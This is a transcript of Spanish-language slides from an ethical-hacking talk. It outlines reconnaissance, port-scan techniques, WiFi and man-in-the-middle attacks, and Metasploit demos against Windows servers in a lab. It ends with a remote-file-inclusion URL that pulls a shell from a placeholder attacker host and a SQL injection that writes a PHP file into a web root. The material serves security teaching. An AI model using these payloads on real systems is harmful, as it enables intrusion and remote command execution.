tecnicas avanzadas de penetracion a sistemas
DESCRIPTION
Tecnicas avanzadas de penetracion en sistemas informaticos- Haking EticoTRANSCRIPT
HACKING ETICO
Tcnicas avanzadas de penetracin a sistemas
Ponente: Rafael Gmez Del ngel Aka : NoSfEr@tU
HACKING ETICOLos hackers ticos son profesionales de la seguridad queaplican sus conocimientos de hacking con finesdefensivos (y legales). Diremos hacker siempre, pero hay que fijarse en el contexto.
QUE ES UN HACKERExperto en algn campo de la informticaConocimientos profundos de diversas Plataformas (Windows, Unix, Linux, android). Conocimientos de redesConocimientos de hardware y software.
Pasos previos al ATAQUE
ReconocimientoPasivoActivoRastreo (escaner)AccesoNiveles del SistemaRedesDOSMantener el accesoBorrado de huellas
FOOTPRINTINGObtencin de los perfiles de seguridad de una organizacin haciendo uso de una metodologa (footprinting).
El resultado del footprinting es un perfil nico de la organizacin en cuanto a sus redes (Internet / Intranet / Extranet /Wireless) y sistemas.
FOOTPRINTING1.- Obtener informacin inicial whois nslookup2.- Localizar el rango de red Traceroute
TIPOS DE ATAQUES1.- Hacking WIFI2.-DOS3.-DDOS4.-M.I.T5.- Envenenamiento DNS6.-Reverse Shell7.-Port scaning
8.-Inyecciones SQL9.-R.F.I10.-XSS11.-Inyeccion de comandos arbitrarios12.-Hijacking13.-Cookie poisoning
Hacking Wifi
Definiciones
BSSID IVSSSID Mode monitorAP WEPSTATION WPADOS
Hacking WEP Fake APWifi DOS (A usuarios y sobre saturacin de frecuencias) Que Ataques analizaremos?
Fake Ap mtodo De Ataque y contra Ataque
DOS (Denial of service)En redes Wifi
*Sobre saturacion de Frecuencias
*Des-autentificacion infinita de usuarios
Deteccin y AnlisisWardriving
Escaneo de PuertosEl escaneo de puertos es el ataque primario y mas comn utilizado en una auditoria ya sea legal o ilegal.Nos permite :ExplorarIdentificarComprender
Tcnicas
TCP connect ()Reverse IdentTCP SYNZombie scanTCP FINACK ScanNull ScanXmas ScanSYN/ACK ScanFragmentacin TCPTCP echoUDP echoTCP ACKTCP SYNICMP echoUDP scanFTP bounce scanAbiertoMedio abiertoSilenciosoBarridosOtrosTipo de escaneo
TCP connect()La mas comn de cualquier software de escaneo de puertosconsiste en usar la llamada connect() de TCP
Intenta establecer conexinSi conecta el puerto esta abiertosi no , el puerto esta cerradoSi no contesta esta silencioso
Muy rpido e invasivo y llamativo en exceso. * Miles de conexiones*Logs
ComportamientoTCP connect()Hacker-------[SYN]------>[0] Puerto TCP Victima OPENHacker[0] Puerto TCP Victima OPEN
Hacker-------[SYN]------->[X] Puerto TCP Victima CLOSEDHacker [O] P. TCP abierto en la VictimaHacker [O] P. TCP abierto en la Victima
Hacker ---[SYN]---> [X] Puerto TCP cerrado en la VictimaHacker [~] Puerto TCP silencioso en la Victima
ACK scanDestinado a identificar aquellos puertos que estn en estado silencioso de forma precisa cuando un puerto esta en este estado o no.Enva paquetes ACK con nmeros de secuencia y confirmacin aleatorios.si el puerto esta abierto, responder con un paquete RST, pues no identificara la conexin como suyasi el puerto esta cerrado responder RST pero si no responde es que esta filtrado.* Apoyo de un escaneo anterior*Variable del ping si responde RST esta vivo si no es in alcanzable.*Identificar firewall bloqueando SYN.
ComportamientoACK scanHacker ---[ACK]---> [O] Puerto TCP abierto en la VictimaHacker [X] Puerto TCP cerrado en la VictimaHacker [~] Puerto TCP silencioso en la Victima
Null scanSimilar al FIN, funciona del mismo modo, enviando paquetes malformados, pero en este caso con los flags desactivados, si el puerto esta cerrado nos responder con RST y En caso de no recibir nada el puerto esta abierto o silencioso.
Ciertos firewalls vigilan los paquetes de finalizacin aqu hace lo que FIN no.
ComportamientoNull scanHacker ---[ ]---> [O] Puerto TCP abierto en la Victima
local ---[ ]---> [X] Puerto TCP cerrado en la VictimaHacker [~] Puerto TCP silencioso en la Victima
La razn
POC Analizar 2 tipos de escaneo con la intencin de evadir un firewall y obtener informacin acerca de los puertos abiertos.
Ataques MIT
DNS cache poisoningARP PoisoningPhishing
EXPLOTACION
Escner de vulnerabilidades
Escner de vulnerabilidades
EXPLOTACION
MetasploitWindows Server 2003
PenetracinWindows Server 2003prueba de concepto
Puerto 445ms08067Crear usuarioHabilitar Escritorio RemotoCambiar la contrasea del Administrador
OBJETIVOMostrar el ataque de penetracin a Windows server 2003 en un ambiente controlado.MetasploitWindows Server 2008 R2
MetasploitWindows Server 2008 R2
Numero de vulnerabilidad : ms09050Encontrar el servidor verificando versin de smbExplotar la vulnerabilidad Denegacin de servicios.
OBJETIVOMostrar el ataque de Denegacin de servicios a Windows server 2008 en un ambiente controlado.MetasploitWindows XP SP3
MetasploitPenetracin a Windows XP SP3 Prueba de concepto
Encontrar la victima verificando versin de SMBLograr la obtencin de una reverse shell Habilitar el uso de escritorio remotoInyectar la conexin a escritorio remoto
OBJETIVOMostrar el ataque de penetracin a windows XP sp3 en un ambiente controlado.MetasploitWindows 7
MetasploitWindows 7 PenetracinPrueba de conceptoUsar INGENIERIA SOCIAL
Copiar netcat a la victima y crear puerta trasera creando REVERSE SHELLVulnerar navegador web.
UPLOAD MI PATH C:\DESTINO\\Downloads
OBJETIVOMostrar el ataque de penetracin a windows 7 en un ambiente controlado.Ataques WEB
Ataques XSS
Analicemos la vulnerabilidad de xss
Es una vulnerabilidad de grado medio alto ya que con estos ataques ser posible el re alizar el hijacking que es el robo de identidad mediante las cookies del navegador
Ataques XSS
Ataques XSS
Ataques XSS
Ataques RFIRemote file inclusion
vulnerabilidad que afecta nicamente a paginas dinmicas programadas en PHP, consiste en enlazar archivos ubicados en un servidor remoto.
RFI se aprovecha del uso irresponsable de lasfunciones include y requiere, las cuales, debido al limitado conocimiento del programador ylas pocas o nulas validaciones que realiza antes de incluir una variable recibida porparametro de URL, pueden ser aprovechadas por usuarios maliciosos para incluir scriptsprogramados para explotar dicha vulnerabilidad.Ataques RFIRemote file inclusion
http://www.victima.com/index.php?nav=pagina1phphttp://www.victimacom/index.php?nav=pagina2.php
http://www.victima.com/index.php?nav=http://atacante.com/shell.txt&command=ls
Inyeccion SQLunion all select "",2,3,4into outfile"/var/www/html/exec.php"
Analicemos este cdigo